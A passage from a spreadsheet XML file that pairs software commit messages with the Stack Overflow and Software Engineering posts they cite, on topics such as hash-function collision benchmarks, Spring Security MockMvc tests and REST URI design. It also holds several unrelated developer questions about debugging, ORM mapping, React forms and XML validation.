reduction on Squid performance depends on the environment, but many busy
SMP proxies handling modern traffic should benefit.
TODO: Linux tests show load balancing effects of SO_REUSEPORT, but
untested FreeBSD probably needs SO_REUSEPORT_LB to get those effects.
Recommended reading:
https://stackoverflow.com/a/14388707</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am receiving the &amp;quot;error: unknown option: --interpreter=mi&amp;quot; when trying to debug with lldb in VS Code on Mac for C++, Clang Compiler, and an OpenMP implementation. I am unable to debug because of it. Below is the launch.json then tasks.json&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;version&amp;quot;: &amp;quot;0.2.0&amp;quot;,
  &amp;quot;configurations&amp;quot;: [
      {
          &amp;quot;name&amp;quot;: &amp;quot;Build with Clang and OpenMP&amp;quot;,
          &amp;quot;type&amp;quot;: &amp;quot;cppdbg&amp;quot;,
          &amp;quot;request&amp;quot;: &amp;quot;launch&amp;quot;,
          &amp;quot;program&amp;quot;: &amp;quot;${workspaceFolder}/CS267/tom_2.1/build/openmp&amp;quot;,  // Path to compiled binary
          &amp;quot;args&amp;quot;: [],
          &amp;quot;stopAtEntry&amp;quot;: false,
          &amp;quot;cwd&amp;quot;: &amp;quot;${workspaceFolder}/CS267/tom_2.1/&amp;quot;,
          &amp;quot;environment&amp;quot;: [],
          &amp;quot;externalConsole&amp;quot;: false,
          &amp;quot;MIMode&amp;quot;: &amp;quot;lldb&amp;quot;,  // Use LLDB for debugging
          &amp;quot;setupCommands&amp;quot;: [
              { &amp;quot;text&amp;quot;: &amp;quot;-enable-pretty-printing&amp;quot;, &amp;quot;description&amp;quot;: &amp;quot;Enable pretty printing&amp;quot;, &amp;quot;ignoreFailures&amp;quot;: true }
          ],
          &amp;quot;preLaunchTask&amp;quot;: &amp;quot;Build with Clang and OpenMP&amp;quot;,
          &amp;quot;miDebuggerPath&amp;quot;: &amp;quot;/usr/bin/lldb&amp;quot;  // Path to LLDB on macOS
      }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;{
    &amp;quot;version&amp;quot;: &amp;quot;2.0.0&amp;quot;,
    &amp;quot;tasks&amp;quot;: [
      {
        &amp;quot;label&amp;quot;: &amp;quot;Build with Clang and OpenMP&amp;quot;,
        &amp;quot;type&amp;quot;: &amp;quot;shell&amp;quot;,
        &amp;quot;command&amp;quot;: &amp;quot;cmake&amp;quot;,
        &amp;quot;args&amp;quot;: [
          &amp;quot;--build&amp;quot;,
          &amp;quot;${workspaceFolder}/CS267/tom_2.1/build&amp;quot;
        ],
        &amp;quot;group&amp;quot;: {
          &amp;quot;kind&amp;quot;: &amp;quot;build&amp;quot;,
          &amp;quot;isDefault&amp;quot;: true
        },
        &amp;quot;problemMatcher&amp;quot;: [&amp;quot;$gcc&amp;quot;],
        &amp;quot;detail&amp;quot;: &amp;quot;Generated task by debugging configuration.&amp;quot;
      }
    ]
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried editing the tasks.json and launch.json numerous times to no avail. Chat has not helped.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C868</t>
  </si>
  <si>
    <t>refactor: rewrite etag (#38568)
x-ref: vercel/next.js#38235 (comment)
Rewrite ETag generate function with `fnv1a` hash.
FNV hashes are designed to be fast while maintaining a low collision rate. The FNV speed allows one to quickly hash lots of data while maintaining a reasonable collision rate (https://softwareengineering.stackexchange.com/questions/49550/which-hashing-algorithm-is-best-for-uniqueness-and-speed/145633).
[fastify-etag](https://github.com/fastify/fastify-etag) also uses `fnv1a` algorithm by default.
cc @shuding: Should `experimental-edge` also switch to `fnv1a` for ETag, for consistency?</t>
  </si>
  <si>
    <t>I tested some different algorithms, measuring speed and number of collisions.
I used three different key sets:
A list of 216,553 English words
🕗﻿archive
(in lowercase)
The numbers
"1"
to
"216553"
(think ZIP codes, and
how a poor hash took down msn.com
🕗﻿archive
)
216,553 "random" (i.e.
type 4 uuid
) GUIDs
For each corpus, the number of collisions and the average time spent hashing was recorded.
I tested:
DJB2
DJB2a
(variant using
xor
rather than
+
)
FNV-1
(32-bit)
FNV-1a
(32-bit)
SDBM
CRC32
Murmur2
(32-bit)
SuperFastHash
Results
Each result contains the average hash time, and the number of collisions
Hash           Lowercase      Random UUID  Numbers
=============  =============  ===========  ==============
Murmur            145 ns      259 ns          92 ns
                    6 collis    5 collis       0 collis
FNV-1a            152 ns      504 ns          86 ns
                    4 collis    4 collis       0 collis
FNV-1             184 ns      730 ns          92 ns
                    1 collis    5 collis       0 collis▪
DBJ2a             158 ns      443 ns          91 ns
                    5 collis    6 collis       0 collis▪▪▪
DJB2              156 ns      437 ns          93 ns
                    7 collis    6 collis       0 collis▪▪▪
SDBM              148 ns      484 ns          90 ns
                    4 collis    6 collis       0 collis**
SuperFastHash     164 ns      344 ns         118 ns
                   85 collis    4 collis   18742 collis
CRC32             250 ns      946 ns         130 ns
                    2 collis    0 collis       0 collis
LoseLose          338 ns        -             -
               215178 collis
Notes
:
The
LoseLose algorithm
(where hash = hash+character) is truly
awful
. Everything collides into the same 1,375 buckets
SuperFastHash is fast, with things looking pretty scattered; by my goodness the
number
collisions. I'm hoping
the guy who ported it got something wrong; it's pretty bad
CRC32 is
pretty good
. Slower, and a 1k lookup table
Do collisions actually happen?
Yes. I started writing my test program to see if hash collisions
actually
happen - and are not just a theoretical construct. They do indeed happen:
FNV-1 collisions
creamwove
collides with
quists
FNV-1a collisions
costarring
collides with
liquid
declinate
collides with
macallums
altarage
collides with
zinke
altarages
collides with
zinkes
Murmur2 collisions
cataract
collides with
periti
roquette
collides with
skivie
shawl
collides with
stormbound
dowlases
collides with
tramontane
cricketings
collides with
twanger
longans
collides with
whigs
DJB2 collisions
hetairas
collides with
mentioner
heliotropes
collides with
neurospora
depravement
collides with
serafins
stylist
collides with
subgenera
joyful
collides with
synaphea
redescribed
collides with
urites
dram
collides with
vivency
DJB2a collisions
haggadot
collides with
loathsomenesses
adorablenesses
collides with
rentability
playwright
collides with
snush
playwrighting
collides with
snushing
treponematoses
collides with
waterbeds
CRC32 collisions
codding
collides with
gnu
exhibiters
collides with
schlager
SuperFastHash collisions
dahabiah
collides with
drapability
encharm
collides with
enclave
grahams
collides with
gramary
...snip 79 collisions...
night
collides with
vigil
nights
collides with
vigils
finks
collides with
vinic
Randomnessification
The other subjective measure is how randomly distributed the hashes are. Mapping the resulting HashTables shows how evenly the data is distributed. All the hash functions show good distribution when mapping the table linearly:
Or as a
Hilbert Map
(
XKCD is always relevant
):
Except when hashing number strings (
"1"
,
"2"
, ...,
"216553"
) (for example,
zip codes
), where patterns begin to emerge in most of the hashing algorithms:
SDBM
:
DJB2a
:
FNV-1
:
All except
FNV-1a
, which still look pretty random to me:
In fact,
Murmur2
seems to have even better randomness with
Numbers
than
FNV-1a
:
When I look at the
FNV-1a
"number" map, I
think
I see subtle vertical patterns. With Murmur I see no patterns at all. What do you think?
The extra
*
in the table denotes how bad the randomness is. With
FNV-1a
being the best, and
DJB2x
being the worst:
Murmur2: .
       FNV-1a: .
        FNV-1: ▪
         DJB2: ▪▪
        DJB2a: ▪▪
         SDBM: ▪▪▪
SuperFastHash: .
          CRC: ▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪
     Loselose: ▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪
                                        ▪
                                 ▪▪▪▪▪▪▪▪▪▪▪▪▪
                        ▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪
          ▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪▪
I originally wrote this program to decide if I even had to
worry
about collisions: I do.
And then it turned into making sure that the hash functions were sufficiently random.
FNV-1a algorithm
The FNV1 hash comes in variants that return 32, 64, 128, 256, 512 and 1024 bit hashes.
The
FNV-1a algorithm
is:
hash = FNV_offset_basis
for each octetOfData to be hashed
    hash = hash xor octetOfData
    hash = hash * FNV_prime
return hash
Where the constants
FNV_offset_basis
and
FNV_prime
depend on the return hash size you want:
Hash Size  
===========
32-bit
    prime: 2^24 + 2^8 + 0x93 = 16777619
    offset: 2166136261
64-bit
    prime: 2^40 + 2^8 + 0xb3 = 1099511628211
    offset: 14695981039346656037
128-bit
    prime: 2^88 + 2^8 + 0x3b = 309485009821345068724781371
    offset: 144066263297769815596495629667062367629
256-bit
    prime: 2^168 + 2^8 + 0x63 = 374144419156711147060143317175368453031918731002211
    offset: 100029257958052580907070968620625704837092796014241193945225284501741471925557
512-bit
    prime: 2^344 + 2^8 + 0x57 = 35835915874844867368919076489095108449946327955754392558399825615420669938882575126094039892345713852759
    offset: 9659303129496669498009435400716310466090418745672637896108374329434462657994582932197716438449813051892206539805784495328239340083876191928701583869517785
1024-bit
    prime: 2^680 + 2^8 + 0x8d = 5016456510113118655434598811035278955030765345404790744303017523831112055108147451509157692220295382716162651878526895249385292291816524375083746691371804094271873160484737966720260389217684476157468082573
    offset: 1419779506494762106872207064140321832088062279544193396087847491461758272325229673230371772250864096521202355549365628174669108571814760471015076148029755969804077320157692458563003215304957150157403644460363550505412711285966361610267868082893823963790439336411086884584107735010676915
See
the main FNV page
for details.
All my results are with the 32-bit variant.
FNV-1 better than FNV-1a?
No. FNV-1a is all around better. There was more collisions with FNV-1a when using the English word corpus:
Hash    Word Collisions
======  ===============
FNV-1   1
FNV-1a  4
Now compare lowercase and uppercase:
Hash    lowercase word Collisions  UPPERCASE word collisions
======  =========================  =========================
FNV-1   1                          9
FNV-1a  4                          11
In this case FNV-1a isn't
"400%"
worse than FN-1, only 20% worse.
I think the more important takeaway is that there are two classes of algorithms when it comes to collisions:
collisions rare
: FNV-1, FNV-1a, DJB2, DJB2a, SDBM
collisions common
: SuperFastHash, Loselose
And then there's the how evenly distributed the hashes are:
outstanding distribution:
Murmur2, FNV-1a, SuperFastHas
excellent distribution:
FNV-1
good distribution:
SDBM, DJB2, DJB2a
horrible distribution:
Loselose
Update
Murmur?
Sure, why not
Update
@whatshisname wondered how a
CRC32
would perform, added numbers to the table.
CRC32 is
pretty good
. Few collisions, but slower, and the overhead of a 1k lookup table.
Snip all erroneous stuff about CRC distribution - my bad
Up until today I was going to use FNV-1a as my
de facto
hash-table hashing algorithm. But now I'm switching to Murmur2:
Faster
Better
randomnessification
of all classes of input
And I really,
really
hope there's something wrong with the
SuperFastHash
algorithm I found
; it's too bad to be as popular as it is.
Update:
From
the MurmurHash3 homepage on Google
:
(1) - SuperFastHash has very poor collision properties, which have been documented elsewhere.
So I guess it's not just me.
Update:
I realized why
Murmur
is faster than the others. MurmurHash2 operates on four bytes at a time. Most algorithms are
byte by byte
:
for each octet in Key
   AddTheOctetToTheHash
This means that as keys get longer Murmur gets its chance to shine.
Update
GUIDs are designed to be unique, not random
A timely post by Raymond Chen reiterates the fact that
"random"
GUIDs are not meant to be used for their randomness. They, or a subset of them, are unsuitable as a hash key:
Even the Version 4 GUID algorithm is not guaranteed to be unpredictable, because the algorithm does not specify the quality of the random number generator.
The Wikipedia article for GUID contains primary research which suggests
that future and previous GUIDs can be predicted based on knowledge of the random number generator state, since the generator is not cryptographically strong.
Randomess is not the same as collision avoidance; which is why it would be a mistake to try to invent your own "hashing" algorithm by taking some subset of a "random" guid:
int HashKeyFromGuid(Guid type4uuid)
{
   //A "4" is put somewhere in the GUID.
   //I can't remember exactly where, but it doesn't matter for
   //the illustrative purposes of this pseudocode
   int guidVersion = ((type4uuid.D3 &amp; 0x0f00) &gt;&gt; 8);
   Assert(guidVersion == 4);
   return (int)GetFirstFourBytesOfGuid(type4uuid);
}
Note
: Again, I put
"random GUID"
in quotes, because it's the "random" variant of GUIDs. A more accurate description would be
Type 4 UUID
. But nobody knows what type 4, or types 1, 3 and 5 are. So it's just easier to call them "random" GUIDs.
All English Words mirrors
https://web.archive.org/web/20070221060514/http://www.sitopreferito.it/html/all_english_words.html
https://drive.google.com/file/d/0B3BLwu7Vb2U-dEw1VkUxc3U4SG8/view?usp=sharing</t>
  </si>
  <si>
    <t xml:space="preserve">I have just started a new project using nHibernate and Fluent for mapping. The architect has sent me a database from which I have generated several hundred entity classes and the corresponding Fluent mapping files. I know this is not the ideal DDD way of doing things but life is rarely ideal.
What I want to do is test that all the mappings are correct, columns mapped correct, OneToMany, ManyToMany etc. Is there some automated or easy way to do this? I have considered just writing a simple repository that loads a record from every entity and make sure no exception is raised, but most of the tables have no data in them yet.
</t>
  </si>
  <si>
    <t>C869</t>
  </si>
  <si>
    <t>Feature/Reforger support (#28)
* remove unnecessary interfaces
https://softwareengineering.stackexchange.com/questions/150045/what-is-the-point-of-having-every-service-class-have-an-interface
https://www.adam-bien.com/roller/abien/entry/service_s_new_serviceimpl_why
* refactor ServerInstallerService, extract TestRunService
* implement automated Arma Reforger installation
* implement Reforger server form
* add Reforger launch parameters
* create config only on server create/update, read generated Reforger dedicated ID on shutdown
* implement getting available Reforger scenarios
* cache Reforger scenarios
* add scenario autocomplete to Reforger server settings</t>
  </si>
  <si>
    <t>Your company is following the SOLID principles and targeting an interface rather than concrete class adds zero overhead to the program.  What they're doing is a very moderate amount of extra work that can pay back volumes when the assumptions that you are making end up being false...and you can never tell what assumption that's going to be.  What you're recommending while slightly less work, can cost many, many, many hours of refactoring that could have just been done ahead of time by simply following basic OO design principles.
You should be learning from these guys and consider yourself lucky. Wish I worked in such an environment where solid design was a priority goal.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a multi-step form using &lt;strong&gt;React Hook Form&lt;/strong&gt;, and I need to reset the dirty state of specific fields dynamically.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Form Structure:&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;The form is &lt;strong&gt;split into multiple steps&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;In &lt;strong&gt;Step 3&lt;/strong&gt;, I fetch topics related to a demo.&lt;/li&gt;
&lt;li&gt;In &lt;strong&gt;Step 4&lt;/strong&gt;, I fetch questions dynamically based on the selected topic.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Each question contains:&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;code&gt;text&lt;/code&gt; field (primitive type).&lt;/li&gt;
&lt;li&gt;An &lt;code&gt;options&lt;/code&gt; array, where each option contains:
&lt;ul&gt;
&lt;li&gt;A &lt;code&gt;videos&lt;/code&gt; array.&lt;/li&gt;
&lt;li&gt;A &lt;code&gt;text&lt;/code&gt; field.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each &lt;strong&gt;question is saved individually&lt;/strong&gt;, and after saving, I want to reset its dirty state &lt;strong&gt;without affecting the rest of the form&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;Example Form Data:&lt;/strong&gt;&lt;/h3&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;
[
  {
    &amp;quot;options&amp;quot;: [
      {
        &amp;quot;videos&amp;quot;: [true],
        &amp;quot;text&amp;quot;: true
      },
      {
        &amp;quot;videos&amp;quot;: [true],
        &amp;quot;text&amp;quot;: true
      }
    ],
    &amp;quot;text&amp;quot;: true
  },
  {
    &amp;quot;options&amp;quot;: [
      {
        &amp;quot;videos&amp;quot;: [true],
        &amp;quot;text&amp;quot;: true
      },
      {
        &amp;quot;videos&amp;quot;: [true],
        &amp;quot;text&amp;quot;: true
      }
    ],
    &amp;quot;text&amp;quot;: true
  }
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On my UI, each question has its own Save button. When saving, I want to clear the dirty fields for that specific question only.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Issue:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;I created a recursive function using &lt;code&gt;resetField()&lt;/code&gt; to reset only the dirty fields of the saved question.&lt;/p&gt;
&lt;p&gt;âœ… It works for &lt;strong&gt;primitive fields&lt;/strong&gt;.&lt;br /&gt;
âŒ But it &lt;strong&gt;does not reset the dirty state for arrays and objects&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;Function Attempt:&lt;/strong&gt;&lt;/h3&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const clearNestedDirtyFields = (dirtyObj, basePath = '') =&amp;gt; {
  Object.keys(dirtyObj).forEach(key =&amp;gt; {
    const path = basePath ? `${basePath}.${key}` : key;
    if (Array.isArray(dirtyObj[key])) {
      dirtyObj[key].forEach((item, index) =&amp;gt; {
        const itemPath = `${path}[${index}]`;
        if (item === true) {
          resetField(itemPath, { keepDirty: false, defaultValue: watch(itemPath) });
        } else if (typeof item === 'object' &amp;amp;&amp;amp; item !== null) {
          clearNestedDirtyFields(item, itemPath);
        }
      });
    } else if (dirtyObj[key] === true) {
      resetField(path, { keepDirty: false, defaultValue: watch(path) });
    } else if (typeof dirtyObj[key] === 'object' &amp;amp;&amp;amp; dirtyObj[key] !== null) {
      clearNestedDirtyFields(dirtyObj[key], path);
    }
  });
};
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;What I Have Tried:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;1ï¸âƒ£ &lt;strong&gt;Adding logs&lt;/strong&gt; to verify that the function correctly processes the nested fields âœ…&lt;br /&gt;
2ï¸âƒ£ &lt;strong&gt;Using &lt;code&gt;resetField(path, { keepDirty: false })&lt;/code&gt; explicitly&lt;/strong&gt; âœ…&lt;br /&gt;
3ï¸âƒ£ &lt;strong&gt;Using &lt;code&gt;setValue(path, watch(path))&lt;/code&gt; before resetting&lt;/strong&gt; âœ…&lt;br /&gt;
4ï¸âƒ£ &lt;code&gt;resetField()&lt;/code&gt; works fine for &lt;strong&gt;primitive fields&lt;/strong&gt;, but does &lt;strong&gt;not clear arrays or objects&lt;/strong&gt; âŒ&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;Expected Behavior:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When I save a &lt;strong&gt;question&lt;/strong&gt;, only that questionâ€™s fields (including nested options and videos) should have their &lt;strong&gt;dirty state reset&lt;/strong&gt;, without affecting other questions or fields in the form.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;How can I reset the &lt;strong&gt;dirty state for nested arrays and objects&lt;/strong&gt; using &lt;code&gt;resetField()&lt;/code&gt; without affecting other fields?&lt;/li&gt;
&lt;li&gt;Is there an &lt;strong&gt;alternative approach&lt;/strong&gt; in React Hook Form to achieve this?&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;Additional Utility Function (For Dirty Values Extraction)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;I am using the following function to get &lt;strong&gt;dirty values&lt;/strong&gt;:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;export function getDirtyValues(dirtyFields, values) {
  return Object.keys(dirtyFields).reduce((prev, key) =&amp;gt; {
    if (!dirtyFields[key] || values[key] === undefined) return prev;
    return {
      ...prev,
      [key]: typeof dirtyFields[key] === 'object' ? getDirtyValues(dirtyFields[key], values[key]) : values[key],
    };
  }, {});
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C87</t>
  </si>
  <si>
    <t>added security for checking that only an admin user can delete others profiles.
got the unit tests working with spring security.  There were MANY blogs on
how to do this, and almost all of them are wrong or outdated since they didn't
work with SecurityContextHolderAwareRequestWrapper.
This gem helped:
http://stackoverflow.com/questions/33524509/spring-mockmvc-spring-security-and-mockito</t>
  </si>
  <si>
    <t>By default the integration looks for a bean with the name of "springSecurityFilterChain". In the example that was provided, a standalone setup is being used which means MockMvc will not be aware of the WebApplicationContext provided within the test and thus not be able to look up the "springSecurityFilterChain" bean.
The easiest way to resolve this is to use something like this:
	MockMvc mockMvc = MockMvcBuilders
			// replace standaloneSetup with line below
			.webAppContextSetup(wac)
			.alwaysDo(print())
			.apply(SecurityMockMvcConfigurers.springSecurity())
			.build();
If you really want to use a standaloneSetup (doesn't really make sense since you already have a WebApplicationContext), you can explicitly provide the springSecurityFilterChain using:
@Autowired
FilterChainProxy springSecurityFilterChain;
@Before
public void startMocks(){
	controller = wac.getBean(RecipesController.class);
	MockMvc mockMvc = MockMvcBuilders
			.standaloneSetup(controller)
			.alwaysDo(print())
			.apply(SecurityMockMvcConfigurers.springSecurity(springSecurityFilterChain))
			.build();
	MockitoAnnotations.initMocks(this);
}</t>
  </si>
  <si>
    <t>added security for checking that only an admin user can delete others
 profiles.
got the unit tests working with spring security.  There were MANY blogs on
how to do this, and almost all of them are wrong or outdated since they didn't
work with SecurityContextHolderAwareRequestWrapper.
This gem helped:
http://stackoverflow.com/questions/33524509/spring-mockmvc-spring-security-and-mockito</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created an XML with inline schema and wrote a Powershell script to validate my XML, but it was failing every time.&lt;/p&gt;
&lt;p&gt;Not sure whether the problem lies with my XML or with the validating script, I copied
&lt;a href="https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms759142(v=vs.85)" rel="nofollow noreferrer"&gt;the inline-namespaced.xml example from Microsoft&lt;/a&gt; and my script said it was valid. My script used LINQ to XML. However, when I &amp;quot;invalidated&amp;quot; the XML by renaming the 'book' element to 'books' (which is not described in the schema), it still said it was valid (!). According to &lt;a href="https://stackoverflow.com/questions/6787424/how-to-validate-an-xml-with-an-xsd-using-linq"&gt;the answer to this question&lt;/a&gt;, LINQ to XML validates everything when the targetNamespace of the schema does NOT match the one of the document.&lt;/p&gt;
&lt;p&gt;So I modified my script to use XmlReader, which also fails to validate the basic example from Microsoft. It says:
&lt;code&gt;Line 2, Pos 2, Could not find schema information for the element 'catalog'.&lt;/code&gt;
So, there is already a problem with the root element.
Obviously, I'm doing something wrong, but what?&lt;/p&gt;
&lt;p&gt;inline-namespaced.xml:&lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;
&amp;lt;catalog xmlns:xsd=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot; xmlns:x=&amp;quot;urn:book&amp;quot;&amp;gt;
  &amp;lt;!-- START OF SCHEMA --&amp;gt;
  &amp;lt;xsd:schema targetNamespace=&amp;quot;urn:book&amp;quot;&amp;gt;
    &amp;lt;xsd:element name=&amp;quot;book&amp;quot;&amp;gt;
      &amp;lt;xsd:complexType&amp;gt;
        &amp;lt;xsd:sequence&amp;gt;
          &amp;lt;xsd:element name=&amp;quot;author&amp;quot; type=&amp;quot;xsd:string&amp;quot;/&amp;gt;
          &amp;lt;xsd:element name=&amp;quot;title&amp;quot; type=&amp;quot;xsd:string&amp;quot;/&amp;gt;
          &amp;lt;xsd:element name=&amp;quot;genre&amp;quot; type=&amp;quot;xsd:string&amp;quot;/&amp;gt;
          &amp;lt;xsd:element name=&amp;quot;price&amp;quot; type=&amp;quot;xsd:float&amp;quot;/&amp;gt;
          &amp;lt;xsd:element name=&amp;quot;publish_date&amp;quot; type=&amp;quot;xsd:date&amp;quot;/&amp;gt;
          &amp;lt;xsd:element name=&amp;quot;description&amp;quot; type=&amp;quot;xsd:string&amp;quot;/&amp;gt;
        &amp;lt;/xsd:sequence&amp;gt;
        &amp;lt;xsd:attribute name=&amp;quot;id&amp;quot; type=&amp;quot;xsd:string&amp;quot;/&amp;gt;
      &amp;lt;/xsd:complexType&amp;gt;
    &amp;lt;/xsd:element&amp;gt;
  &amp;lt;/xsd:schema&amp;gt;
  &amp;lt;!-- END OF SCHEMA --&amp;gt;
  &amp;lt;x:book id=&amp;quot;bk101&amp;quot;&amp;gt;
    &amp;lt;author&amp;gt;Gambardella, Matthew&amp;lt;/author&amp;gt;
    &amp;lt;title&amp;gt;XML Developer's Guide&amp;lt;/title&amp;gt;
    &amp;lt;genre&amp;gt;Computer&amp;lt;/genre&amp;gt;
    &amp;lt;price&amp;gt;44.95&amp;lt;/price&amp;gt;
    &amp;lt;publish_date&amp;gt;2000-10-01&amp;lt;/publish_date&amp;gt;
    &amp;lt;description&amp;gt;An in-depth look at creating applications with XML.&amp;lt;/description&amp;gt;
  &amp;lt;/x:book&amp;gt;
&amp;lt;/catalog&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Powershell 5.1 script using XmlReader:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;# Load the XML content
# From: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms759142(v=vs.85)
$xmlFile = &amp;quot;C:\Temp\inline-namespaced.xml&amp;quot;
# Prepare the event handler for validation errors
$eventHandler = {
    param ($sender, $eventArgs)
    Write-Host $(&amp;quot;Line {0}, Pos {1}, {2}&amp;quot; -f $eventArgs.Exception.LineNumber, $eventArgs.Exception.LinePosition, $eventArgs.Exception.Message)
}
# Create XmlReaderSettings and enable schema validation
$settings = New-Object System.Xml.XmlReaderSettings
$settings.ValidationType = [System.Xml.ValidationType]::Schema
$settings.ValidationFlags =
    [System.Xml.Schema.XmlSchemaValidationFlags]::ProcessInlineSchema -bor
    [System.Xml.Schema.XmlSchemaValidationFlags]::ReportValidationWarnings
# Attach the event handler
$settings.add_ValidationEventHandler($eventHandler)
# Create the XmlReader with the settings
$reader = [System.Xml.XmlReader]::Create($xmlFile, $settings)
# Read through the XML content to trigger validation
while ($reader.Read()) { }
$reader.Close()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C870</t>
  </si>
  <si>
    <t>Major Frontend Refactor (#15)
* Update REST API
It doesn't make sense for /from/&lt;x&gt;/to/&lt;y&gt; to be a URI path, since it's not hierarchical. You should be able to specify start and/or end with whatever other query params you want, in whatever order you want.
For more information, see this *excellent* SO question.
https://softwareengineering.stackexchange.com/questions/270898/designing-a-rest-api-by-uri-vs-query-string/285724
* Add backlinks to ranges from entries
* Big frontend overhaul that improves navigation and color coherence</t>
  </si>
  <si>
    <t>First: As Per [RFC 3986 §3.4 (Uniform Resource Identifiers § (Syntax Components)|Query][1]
&gt; **3.4 Query**
&gt;
   The query component contains non-hierarchical data that, along with
   data in the path component (Section 3.3), serves to identify a
   resource within the scope of the URI's scheme and naming authority
   (if any).
Query components are for retrieval of non-hierarchical data; there are few things more hierarchical in nature than a family tree!  Ergo *- regardless of whether you think it is "REST-y" or not-* in order to conform to the formats, protocols, and frameworks of and for developing systems on the internet, you must not use the query string to identify this information.
REST has nothing to do with this definition.
Before addressing your specific questions, your query parameter of "search" is poorly named.  Better would be to treat your query segment as a dictionary of key-value pairs.  
Your query string could be more appropriately defined as 
`?first_name={firstName}&amp;last_name={lastName}&amp;birth_date={birthDate}` etc.
To answer your specific questions
---
&gt;1) Which API design is more RESTful, and why? Semantically, they mean and behave the same way. The last resource in the URI is "children", effectively implying that the client is operating on the children resource.
I don't think this is as clear cut as you seem to believe.
None of these resource interfaces are RESTful.  The **major** precondition for the RESTful architectural style is that Application State transitions must be communicated from the server as hypermedia.  People have labored over the structure of URIs to make them somehow "RESTful URIs" but the formal literature regarding REST actually has very little to say about this. My personal opinion is that much of the meta-misinformation about REST was published with the intent of breaking old, bad habits. (Building a truly "RESTful" system is actually quite a bit of work. The industry glommed on to "REST" and back-filled some orthogonal concerns with nonsensical qualifications and restrictions. )
What the REST literature does say is that if you are going to use HTTP as your application protocol, you must adhere to the formal requirements of the protocol's specifications and you cannot "make http up as you go and still declare that you are using http"; if you are going to use URIs for identifying your resources, you must adhere to the formal requirements of the specifications regarding URI/URLs.
Your question is addressed directly by RFC3986 §3.4, which I have linked above.  The bottom line on this matter is that even though a conforming URI is insufficient to consider an API "RESTful", if you want your system to actually *be* "RESTful" and you are using HTTP and URIs, then you cannot identify hierarchical data through the query string because:
&gt; **3.4 Query**
&gt; 
The query component contains non-hierarchical data
...it's as simple as that.
&gt; 2) What are the pros and cons to each in terms of understandability from a client's perspective, and maintainability from the designer's perspective.
The "pros" of the first two is that they are *on the right path*. The "cons" of the third one is that it appears to be flat out wrong.
As far as your understandability and maintainability concerns, those are definitely subjective and depend on the comprehension level of the client developer and the design chops of the designer.  The URI specification is the definitive answer as to how URIs are supposed to be formatted.  Hierarchical data is supposed to be represented on the path and with path parameters.  Non-hierarchical data is supposed to be represented in the query.  The fragment is more complicated, because its semantics depend specifically upon the media type of the representation being requested.  So to address the "understandability" component of your question, I will attempt to translate exactly what your first two URIs are actually saying. Then, I will attempt to represent what you say you are trying to accomplish with valid URIs.
**Translation of your verbatim URIs to their semantic meaning**
`/myservice/api/v1/grandparents/{grandparentID}/parents/children?search={text}`
This says for the parents of grandparents, find their child having `search={text}`
What you said with your URI is only coherent if searching for a grandparent's siblings.  With your "grandparents, parents, children" you found a "grandparent" went up a generation to their parents and then came back down to the "grandparent" generation by looking at the parents' children.  
`/myservice/api/v1/parents/{parentID}/children?search={text}`
